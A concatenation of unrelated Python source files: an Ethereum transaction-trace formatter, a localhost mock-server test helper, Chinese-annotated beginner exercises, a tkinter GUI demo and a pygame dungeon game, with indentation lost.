# returning from an external call, return tree by jumpDepth of the previous depth
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1].append([key])
active_tree.append(active_tree[-1][-1])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
try:
result = [next(i for i in trace_range if trace[i]["source"])]
except StopIteration:
return ""
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}{color}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}{color}"
return key
def _convert_0x_to_empty_bytes(value: Any) -> Any:
# black cannot parse `0x` without any trailing zeros, so we temporarily
# replace it with an empty bytestring
final = []
for item in value:
if isinstance(item, (list, tuple)):
final.append(_convert_0x_to_empty_bytes(item))
elif str(item) == "0x":
final.append(b"")
else:
final.append(item)
return type(value)(final)
def _format(value: Any) -> str:
if isinstance(value, (list, tuple)):
value = _convert_0x_to_empty_bytes(value)
mode = black.FileMode(line_length=60)
value = black.format_str(str(value), mode=mode).replace('b""', "0x")
return str(value)
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
result: List = [key, f"address: {step['address']}"]
if "value" in subcall:
result.append(f"value: {subcall['value']}")
if "inputs" not in subcall:
result.append(f"calldata: {subcall.get('calldata')}")
elif subcall["inputs"]:
result.append(
["input arguments:", *(f"{k}: {_format(v)}" for k, v in subcall["inputs"].items())]
)
else:
result.append("input arguments: None")
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result.append(["return values:", *(_format(i) for i in value)])
else:
if isinstance(value, tuple):
value = value[0]
result.append(f"return value: {_format(value)}")
elif "returndata" in subcall:
result.append(f"returndata: {subcall['returndata']}")
if "revert_msg" in subcall:
result.append(f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}")
return build_tree([result], multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
data = HexBytes("".join(step["memory"]))[offset : offset + length]
# append zero-bytes if allocated memory ends before `length` bytes
data = HexBytes(data + b"\x00" * (length - len(data)))
return data
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if isinstance(contract._project, project_main.Project):
# only evaluate coverage for contracts that are part of a `Project`
last_map["coverage"] = True
if contract._build.get("language") == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
def _is_call_to_precompile(subcall: dict) -> bool:
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
return True if precompile_contract.search(str(subcall["to"])) is not None else False
|
helpers.py
|
from multiprocessing import Process, Queue
from werkzeug.wrappers import Request
def make_server(port, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
options = {'handler_class': QuietHandler}
return make_server('127.0.0.1', port, handler, **options)
class http_server(object):
def __init__(self, port, handler):
self.queue = Queue()
self.server = make_server(port, handler)
def __enter__(self):
def run_app(server):
server.handle_request()
self.process = Process(target=run_app, args=(self.server,))
self.process.start()
return self.queue
def __exit__(self, exc_type, exc_val, exc_tb):
self.server.server_close()
self.server.socket.close()
self.process.terminate()
self.process.join()
class mock_server(object):
def __init__(self, port, status, headers, response):
def handler(environ, start_response):
request = Request(environ)
content_length = request.content_length
self.queue.put({'url': request.url, 'body': environ['wsgi.input'].read(content_length)})
start_response(status, headers)
return [response]
self.queue = Queue()
self.server = make_server(port, handler)
def __enter__(self):
def run_app(server):
server.handle_request()
# self.process = Process(target=run_app, args=(self.port, self.queue, self.status, self.headers, self.response))
self.process = Process(target=run_app, args=(self.server,))
self.process.start()
return self.queue
def __exit__(self, exc_type, exc_val, exc_tb):
self.server.server_close()
self.server.socket.close()
self.process.terminate()
self.process.join()
def host():
return 'tcp://127.0.0.1:56000'
|
2.py
|
'''
#filter()内置函数
def id_odd(n):
return n % 2==0
l=list(filter(id_odd,range(0,15)))
print(l)
#删除序列中空字符串
def not_empty(s):
return s and s.strip()
l=list(filter(not_empty,['a','','b',None,'c',' ']))
print(l)
#用filter求素数
def su():
n=1
while True:
n+=2
yield n #n=3
def shaixuan(n):
return lambda x: x%n>0
def shengchengqi():
yield 2
startnum= su()
while True:
n=next(startnum)
yield n
startnum = filter(shaixuan(n),startnum)
for n in shengchengqi():
if n<1000:
print(n)
else:
break
#筛选出回数例如12321,909
def is_palindrome(n):
str(n)==str(n)[::-1]
return str(n)==str(n)[::-1]
# 测试:
output = filter(is_palindrome, range(1, 1000))
print('1~1000:', list(output))
if list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:
print('测试成功!')
else:
print('测试失败!')
'''
'''
#sorted()内置函数
l=sorted([1,4,-4,6,0])
print(l)
l=sorted([1,3,-4,5,-6],key=abs)
print(l)
l=sorted(['A','Z','a','zn','cxy','zhy'])
print(l)
l=sorted(['A','Z','a','zn','cxy','zhy'],key=str.lower)
print(l)
l=sorted(['A','Z','a','zn','cxy','zhy'],key=str.lower,reverse=True)
print(l)
from operator import itemgetter
L = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]
#按人名排序
a=sorted(L,key=itemgetter(0))
print(a)
#按成绩排序{低到高}
b=sorted(L,key=itemgetter(1))
print(b)
#按成绩排序{低到高}
c=sorted(L,key=itemgetter(1),reverse=True)
print(c)
'''
'''
#return
def createCounter():
def counter(x):
def g():
return x+1
return g
f=[]
for i in range(1,6):
f.append(counter(i))
return f
def count():
fs = []
def f(n):
def j():
return n * n
return j
for i in range(1, 4):
fs.append(f(i))
return fs
f1, f2, f3 = count()
print(f1())
print(f2())
print(f3())
'''
'''
#lambda表达式
f=lambda x:x*x
print(f(2))
def is_odd(n):
return n%2==1
l=list(filter(is_odd,range(1,20)))
print(l)
L=list(filter(lambda n:n%2==1,range(1,20)))
print(L)
'''
'''
def now():
print('zn')
f=now
print(f())
print(now.__name__)
print(f.__name__)
def log(func):
def w(*args,**kw):
print('call %s():'%func.__name__)
return func(*args,**kw)
return w
@log
def now():
print('20181025')
now = log(now)
print(now())
'''
'''
#偏函数,传入base参数,就可以做N进制的转换
l=int('12345',base=16)
print(l)
#二进制转十进制
def int2(x,base=2):
return int(x,base)
print(int2('101'))
#二进制转十进制换一种实现
import functools
#functools.partial的作用就是,把一个函数的某些参数给固定住(也就是设置默认值),返回一个新的函数
int2=functools.partial(int,base=2)
print(int2('111'))
print(int2('111',base=2))
args=(10,2,3,4)
print(max(*args))
'''
'test'
'''
def zn():
l=[]
for x in range(1,100,2):
l.append(x*(x+1))
print(l[len(l)-1])
print(zn())
'''
'''
try:
print('try---')
r=10/2
print('result:',r)
except ZeroDivisionError as e:
print('except:',e)
finally:
print('finally...')
print('END____')
try:
print('try...')
r=10/int('a')
print('result:',r)
except ValueError as e:
print('ValueError:',e)
except ZeroDivisionError as e:
print('ZeroDivisionError:',e)
finally:
print('finally...')
print('END')
'''
'''
from functools import reduce
def str2num(s):
return float(s)
def calc(exp):
ss = exp.split('+')
ns = map(str2num, ss)
return reduce(lambda acc, x: acc + x, ns)
def main():
r = calc('100 + 200 + 345')
print('100 + 200 + 345 =', r)
r = calc('99 + 88 + 7.6')
print('99 + 88 + 7.6 =', r)
main()
class Dict(dict):
def __init__(self, **kw):
super().__init__(**kw)
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(r"'Dict' object has no attribute '%s'" % key)
def __setattr__(self, key, value):
self[key] = value
d=dict(a=1,b=2)
print(d['a'])
print(d)
import unittest
from mydict import Dict
class TestDict(unittest.TestCase):
def test_init(self):
d = Dict(a=1, b='test')
self.assertEqual(d.a, 1)
self.assertEqual(d.b, 'test')
self.assertTrue(isinstance(d, dict))
def test_key(self):
d = Dict()
d['key'] = 'value'
self.assertEqual(d.key, 'value')
def test_attr(self):
d = Dict()
d.key = 'value'
self.assertTrue('key' in d)
self.assertEqual(d['key'], 'value')
def test_keyerror(self):
d = Dict()
with self.assertRaises(KeyError):
value = d['empty']
def test_attrerror(self):
d = Dict()
with self.assertRaises(AttributeError):
value = d.empty
if __name__ == '__main__':
unittest.main()
'''
'''
import unittest
class Student(object):
def __init__(self, name, score):
self.name = name
self.score = score
def get_grade(self):
if self.score>100 or self.score<0:
raise ValueError("the score is wrong!")
if 80>self.score >= 60:
return 'B'
if self.score >= 80:
return 'A'
return 'C'
class TestStudent(unittest.TestCase):
def test_80_to_100(self):
s1 = Student('Bart', 80)
s2 = Student('Lisa', 100)
print(s1.get_grade())
self.assertEqual(s1.get_grade(), 'A')
self.assertEqual(s2.get_grade(), 'A')
def test_60_to_80(self):
s1 = Student('Bart', 60)
s2 = Student('Lisa', 79)
self.assertEqual(s1.get_grade(), 'B')
self.assertEqual(s2.get_grade(), 'B')
def test_0_to_60(self):
s1 = Student('Bart', 0)
s2 = Student('Lisa', 59)
self.assertEqual(s1.get_grade(), 'C')
self.assertEqual(s2.get_grade(), 'C')
def test_invalid(self):
s1 = Student('Bart', -1)
s2 = Student('Lisa', 101)
with self.assertRaises(ValueError):
s1.get_grade()
with self.assertRaises(ValueError):
s2.get_grade()
if __name__ == '__main__':
unittest.main()
'''
'''
#读取文件内容并关闭文件方法1
try:
f=open("C:/Users/zn/Desktop/hexo.txt",'r')
print(f.read())
finally:
if f:
f.close()
#读取文件内容并关闭文件方法2
with open("C:/Users/zn/Desktop/hexo.txt",'r') as f:
print(f.read())
#读取图片,视频用'rb'
with open("C:/Users/zn/Desktop/1.png",'rb') as f:
print(f.read())
#读取非Utf-8编码的文本文件用'gbk'
'''
'''
#写文件'w',会覆盖原有文件内容,'a'追加到文件中,不覆盖
with open("/Users/zn/Desktop/test.txt",'w') as f:
f.write('hello zn')
'''
'''
#StringIO
#内容中写str
from io import StringIO
f=StringIO()
f.write('hello')
f.write(' ')
f.write('world')
print(f.getvalue())
#内存中读str
from io import StringIO
f=StringIO('hello\nnihaoa\nbye')
while True:
s=f.readline()
if s=="":
break
print(s.strip())
#BytesIO[只能操作str]
#写
from io import BytesIO
f=BytesIO()
a=f.write('中国'.encode('utf-8'))
print(a)
print(f.getvalue())
#读
from io import BytesIO
f=BytesIO(b'\xe4\xb8\xad\xe6\x96\x87')
print(f.read())
'''
'''
import os
#print(os.name)
#print(os.environ)
#print(os.environ.get('PATH'))
#print(os.environ.get('x','default'))
#print(os.path.abspath('.'))
#print(os.path.join('/Users/zn/Desktop','testdir'))
#print(os.mkdir('/Users/zn/Desktop/testdir'))
#print(os.rmdir('/Users/zn/Desktop/testdir'))
#print(os.rename('test.txt','test.py'))
#要列出所有的.py文件
a=[x for x in os.listdir('.') if os.path.isfile(x) and os.path.splitext(x)[1]=='.py']
print(a)
'''
'''
#json序列化,反序列化
import json
d=dict(name='Bob',age=20,score=88)
print(json.dumps(d))
#输出{"name": "Bob", "age": 20, "score": 88}
json_str='{"age":20,"score":88,"name":"bob"}'
print(json.loads(json_str))
'''
'''
import json
class Student(object):
def __init__(self,name,age,score):
self.name=name
self.age=age
self.score=score
s=Student('Bob',20,88)
def student2dic(std):
return{
'name':std.name,
'age':std.age,
'score':std.score
}
print(json.dumps(s,default=student2dic))
'''
'''
from multiprocessing import Process
import os
# 子进程要执行的代码
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
'''
|
Interfaz.py
|
try:
import tkinter as tk
except:
import Tkinter as tk
import threading
import random
class Tarjeta(object):
"""docstring for Tarjeta"""
def __init__(self, master = None, coords = None, color = "black", image = None):
super(Tarjeta, self).__init__()
self.master = master
self.coords = coords
if (len(self.coords) != 2) and (len(self.coords) != 4):
raise ValueError("2 points to form a rectangle")
if len(self.coords) == 2:
puntos = []
for i in self.coords:
if type(i) != tuple:
raise ValueError("4 points to form a rectangle")
else:
puntos += list(i)
self.coords = puntos
self.color = color
self.shape = self.master.create_polygon(self.coords[0], self.coords[1], self.coords[2],
self.coords[1], self.coords[2], self.coords[3], self.coords[0], self.coords[3], fill = self.color)
print("<class Tarjeta>")
self.master.bind("<Button-1>", self.press)
def press(self, event = None):
r = lambda: random.randint(0,100)
self.master.itemconfig(self.shape, fill = '#%02X%02X%02X' % (r(),r(),r()))
x = (self.coords[0]+self.coords[2])/2
y = (self.coords[1]+self.coords[3])/2
coords = self.master.coords(self.shape)
verticalArriba = -2
verticalAbajo = -2
horizontalDrcha = -2
horizontalIzq = -2
if event.x < x:
horizontalIzq = 2
else:
horizontalDrcha = 2
if event.y < y:
verticalArriba = 2
else:
verticalAbajo = 2
for i in range(10):
coords = self.master.coords(self.shape)
self.master.coords(self.shape, coords[0] + verticalArriba, coords[1] + horizontalIzq,
coords[2] - verticalArriba, coords[3] + horizontalDrcha, coords[4] - verticalAbajo,
coords[5] + horizontalIzq, coords[6] + verticalAbajo, coords[7] + horizontalDrcha)
self.master.update()
self.master.after(10)
self.master.after(10)
for i in range(10):
coords = self.master.coords(self.shape)
self.master.coords(self.shape, coords[0] - verticalArriba, coords[1] - horizontalIzq,
coords[2] + verticalArriba, coords[3] - horizontalDrcha, coords[4] + verticalAbajo,
coords[5] - horizontalIzq, coords[6] - verticalAbajo, coords[7] - horizontalDrcha)
self.master.update()
self.master.after(10)
def DetectButton(ID, event = None):
ID.config(bg = "#212f3d") #"#17202a")
def LeaveButton(ID, event = None):
ID.config(bg = "#1c2833")
def moveHeader(event = None, operator = '<', number = -8):
if operator == "<":
frameHeader.unbind("<Motion>")
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
else:
frameHeader.unbind('<Leave>')
frameHeader.bind("<Motion>", moveHeader)
x = int(frameHeader.place_info()['x'])
y = int(frameHeader.place_info()['y'])
condition = eval(str(y) + operator + str(number))
while condition:
condition = eval(str(y) + operator + str(number))
try:
if operator == "<":
frameHeader.place(x = x, y = y+1)
else:
frameHeader.place(x = x, y = y-1)
except: pass
window.update()
window.after(2)
x = int(frameHeader.place_info()["x"])
y = int(frameHeader.place_info()["y"])
def movHeader(event = None, operator = '<', number = -8):
hilo = threading.Thread(target = mHeader, args = (operator, number), daemon = True)
hilo.start()
# ==========================================================================================
# MAIN
# ==========================================================================================
window = tk.Tk()
print(window.winfo_screenwidth())
window.title("Homogeneous Project")
f = tk.Canvas(window, width = 1250, height = 700, bg = "#308180")
f.pack()
print(tk.Canvas.create_polygon)
#shape = f.create_polygon((300,300),(600,300),(300,600),(600,600),fill = "black") #UPLEFT UPRIGH DWLEFT DWRIGHT
f.create_oval(300-5,300-5,300+5,300+5, fill = 'red')
f.create_oval(600-5,300-5,600+5,300+5,fill = 'green')
f.create_oval(300-5,600-5,300+5,600+5,fill = 'yellow')
f.create_oval(600-5,600-5,600+5,600+5,fill = 'blue')
'''
foto = tk.PhotoImage(file="./Images/a.png")
label = tk.Label(f, image=foto)
label.place(x = 0, y = 0)
label.photo = foto
'''
Tarjeta(f, coords = (300,300,600,600))
frameHeader = tk.Frame(f, width = 1250, height = 62, bg = "gray12")
frameHeader.place(x = 0, y = -50)
frameHome = tk.Frame(f, width = 200, height = 700, bg = "#17202a")
frameHome.place(x = -0, y = 0) # x = 0
NumButtons = 6
Buttons = []
for Button in range(NumButtons):
B = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
B.place(x = -0, y = Button*62) # 212f3d # x = 0
Buttons.append(B)
Tarjeta
OptionSqrs = []
colors = []
Jugadores = []
for i in range(len(Jugadores)):
O = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
# ------------------------------------------------------------------------------------------
# EVENTS AND BINDINGS
# ------------------------------------------------------------------------------------------
frameHeader.bind('<Motion>', moveHeader)
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
list(map(lambda Button: Button.bind("<Motion>", lambda event,
arg = Button: DetectButton(arg, event)), Buttons))
list(map(lambda Button: Button.bind("<Leave>", lambda event,
arg = Button: LeaveButton(arg, event)), Buttons))
window.bind("<Escape>", quit)
tk.mainloop()
|
Game.py
|
import time
import sys
import random
import sqlite3
from threading import Thread
import pygame.font
from files.ui import Bar, Button
from files.enemies import *
from files.environment_classes import Wall, Floor
from files.items import *
from files.global_stuff import *
from files.units_characteristics import increase_mob_characteristics, make_default_mob_characteristics
# pygame stuff below
print(WIDTH, HEIGHT)
pygame.init()
pygame.mixer.init()
game_instance = None
screen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN | pygame.DOUBLEBUF, 16)
clock = pygame.time.Clock()
font = pygame.font.Font("files/font1.ttf", 36)
font_splash_boot = pygame.font.SysFont('rockwell', 100)
PLAY_ANIMATION = pygame.USEREVENT + 1
pygame.event.set_allowed([pygame.QUIT, pygame.KEYDOWN, pygame.KEYUP, PLAY_ANIMATION])
pygame.time.set_timer(PLAY_ANIMATION, 100)
pygame.display.set_caption("Knights of souls! V1.0")
class Game:
player_start_pos = [(128, 448), (128, 576), (320, 576), (320, 448)]
def __init__(self, chosen_hero):
self.left_walls = []
self.right_walls = []
self.other_environment = []
self.current_level_mobs = []
self.items_on_maps = []
self.bar_group = pygame.sprite.Group()
self.banners_group = pygame.sprite.Group()
self.buttons_group = pygame.sprite.Group()
self.running = False
self.level_just_finished = False
self.playing = True
self.quitting = False
self.paused = False
self.current_level = 0
self.last_level = False
self.floor = 1
self.dx = 576
self.on_player_die_timer = False
self.render_text = ""
self.transitioning = []
self.transition_counter = 255
self.generate_levels()
self.player = chosen_hero(*random.choice(self.player_start_pos))
# ui stuff
self.hp_bar = Bar(50, HEIGHT - 170, pygame.Color('red'), self.player, "hp", "max_hp", screen, self.bar_group)
self.armor_bar = Bar(50, HEIGHT - 110, pygame.Color('grey'), self.player, "armor", "max_armor", screen,
self.bar_group)
self.exit_button = False
def quit_this_window(self):
change_draw_area(0, 0, WIDTH, HEIGHT)
particle_group.empty()
hitbox_group.empty()
all_sprites.empty()
con = sqlite3.connect("files/db.sqlite")
cur = con.cursor()
for i in temp_stats:
update_statistics(i, cur)
con.commit()
con.close()
make_default_mob_characteristics()
for i in temp_stats:
temp_stats[i] = 0
self.running = False
def exit_button_pressed(self):
self.quitting = True
self.exit_button.kill()
self.render_text = ["Cleaning battlefield..."]
self.transitioning = [self.fade_in, self.render_center_text]
self.playing = False
Timer(3, self.quit_this_window).start()
def fade_in(self):
surface = pygame.Surface((WIDTH, HEIGHT)).convert_alpha()
surface.fill(pygame.Color(0, 0, 0, int(self.transition_counter)))
screen.blit(surface, (0, 0))
self.transition_counter += 2
if self.transition_counter >= 255:
self.transitioning = []
def fade_out(self):
surface = pygame.Surface((WIDTH, HEIGHT)).convert_alpha()
surface.fill(pygame.Color(0, 0, 0, int(self.transition_counter)))
screen.blit(surface, (0, 0))
self.transition_counter -= 1.5
if self.transition_counter <= 0:
self.transitioning = []
def render_center_text(self):
y = -60
for str_text in self.render_text:
text = font_splash_boot.render(str_text, True, (255, 255, 255))
text.set_alpha(self.transition_counter)
dx, dy = text.get_width() // 2, text.get_height() // 2
screen.blit(text, (WIDTH // 2 - dx, HEIGHT // 2 - dy + y))
y += 120
def on_player_die(self):
self.quitting = True
a = sum([g for i, g in temp_stats.items()])
self.render_text = ["YOU DIED", f'Enemies killed: {a}']
self.transitioning = [self.fade_in, self.render_center_text]
self.playing = False
Timer(5, self.quit_this_window).start()
def generate_levels(self):
# creating START room!
self.other_environment.append(Wall(0, 256, "Environment/MiniRoom/TopWall.png"))
self.other_environment.append(Wall(0, 704, "Environment/MiniRoom/BottomWall.png"))
self.other_environment.append(Wall(0, 256, "Environment/MiniRoom/LeftWall0.png"))
self.other_environment.append(Wall(self.dx - 64, 256, "Environment/MiniRoom/RightWall1.png"))
self.other_environment.append(Wall(self.dx - 64, 576, "Environment/MiniRoom/RightWall2.png"))
Floor(0, 256, "Environment/MiniRoom/Floor.png")
for i in range(0, 5):
self.other_environment.append(Wall(1472 * i + self.dx, 0, "Environment/TopWall.png"))
self.left_walls.append((Wall(1472 * i + self.dx, 0, "Environment/LeftWall1.png"),
Wall(1472 * i + self.dx, 576, "Environment/LeftWall2.png")))
self.right_walls.append(Wall(1472 * i + 1408 + self.dx, 0, "Environment/RightWall0.png"))
self.other_environment.append(Wall(1472 * i + self.dx, 960, "Environment/BottomWall.png"))
self.other_environment.append(Floor(1472 * i + self.dx, 0, "Environment/floor.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 256, "Environment/MiniRoom/TopWall.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 704, "Environment/MiniRoom/BottomWall.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 256, "Environment/MiniRoom/LeftWall1.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 576, "Environment/MiniRoom/LeftWall2.png"))
self.other_environment.append(Wall(self.dx * 2 - 64 + 1472 * 5, 256, "Environment/MiniRoom/RightWall0.png"))
self.other_environment.append(Floor(self.dx + 1472 * 5, 256, "Environment/MiniRoom/Floor.png"))
self.transitioning = [self.fade_out, self.render_center_text]
self.render_text = [f"FLOOR {self.floor}", "Welcome to the dungeons"]
def next_floor(self):
self.level_just_finished = False
self.playing = False
self.transition_counter = 0
self.transitioning = [self.fade_in]
for i in self.items_on_maps:
if not (isinstance(i, TwinMirror) or isinstance(i, ElectricRing)):
i.die()
for i in self.right_walls + self.left_walls + self.other_environment:
try:
i.die()
except Exception:
pass
self.items_on_maps.clear()
self.right_walls.clear()
self.left_walls.clear()
self.other_environment.clear()
self.generate_levels()
self.player.set_pos(*self.player_start_pos[0])
self.level_just_finished = True
self.last_level = False
self.current_level = 0
self.floor += 1
increase_mob_characteristics(self.floor)
self.render_text = [f"FLOOR {self.floor}", "Mobs became more dangerous"]
while self.transitioning:
time.sleep(0.25)
self.transition_counter = 255
self.transitioning = [self.fade_out, self.render_center_text]
self.playing = True
con = sqlite3.connect("files/db.sqlite")
cur = con.cursor()
for i in temp_stats:
update_statistics(i, cur)
con.commit()
con.close()
def level_finished(self):
print("LEVEL FINISHED")
self.level_just_finished = True
self.right_walls[0].die()
del self.right_walls[0]
self.other_environment.append(
Wall(1472 * (self.current_level - 1) + 1408 + self.dx, 576, "Environment/RightWall2.png"))
self.other_environment.append(
Wall(1472 * (self.current_level - 1) + 1408 + self.dx, 0, "Environment/RightWall1.png"))
if self.player.apple_bag_count:
self.player.max_hp += self.player.apple_bag_count
self.player.heal(self.player.apple_bag_count)
if self.current_level == 5:
self.last_level = True
self.items_on_maps.append(get_random_epic_item()(1472 * (self.current_level - 0.5) + self.dx, 512))
else:
self.items_on_maps.append(get_random_item()(1472 * (self.current_level - 0.5) + self.dx, 512))
def start_wave(self):
print("START WAVE")
self.level_just_finished = False
self.left_walls[0][0].die()
self.left_walls[0][1].die()
del self.left_walls[0]
self.left_walls.append(Wall(1472 * (self.current_level - 1) + self.dx, 0, "Environment/LeftWall0.png"))
for i in range(self.current_level + self.floor):
temp = random.choice([MiniGolem, Snake, Tree, Dog, IceSoul, FireSoul])
self.current_level_mobs.append(
temp(random.randrange(1472 * (self.current_level - 1) + TILE_WIDTH + self.dx,
1472 * (self.current_level - 1) + 1000 + self.dx),
random.randrange(TILE_HEIGHT * 2, 1024 - TILE_HEIGHT * 3),
[self.player])
)
def start_boss_fighting(self):
print("START BOSS FIGHT")
# closing door
self.level_just_finished = False
self.left_walls[0][0].die()
self.left_walls[0][1].die()
del self.left_walls[0]
self.left_walls.append(Wall(1472 * (self.current_level - 1) + self.dx, 0, "Environment/LeftWall0.png"))
temp = random.choice([DragonBoss, Golem, NecroBoss, Hunter])(1472 * (self.current_level - 0.5)
+ self.dx, 512, [self.player])
self.current_level_mobs.append(temp)
Bar(WIDTH // 2, 120, pygame.Color("red"), self.current_level_mobs[0], "hp",
"max_hp", screen, self.bar_group, text=f"{temp.name} HP", c=True, len_=WIDTH * 0.8)
def run(self):
self.level_just_finished = True
self.running = True
background_color = (34, 32, 53)
while self.running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit(0)
elif event.type == PLAY_ANIMATION:
for _obj in play_animation_group:
_obj.change_image()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
if self.quitting is True:
continue
self.paused = False if self.paused else True
if self.paused:
self.exit_button = Button(WIDTH // 2, HEIGHT // 2, self.buttons_group, "main_menu.png",
"main_menu_pressed.png", self.exit_button_pressed)
else:
self.exit_button.kill()
elif event.key == pygame.K_LSHIFT:
self.player.running = True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_LSHIFT:
self.player.running = False
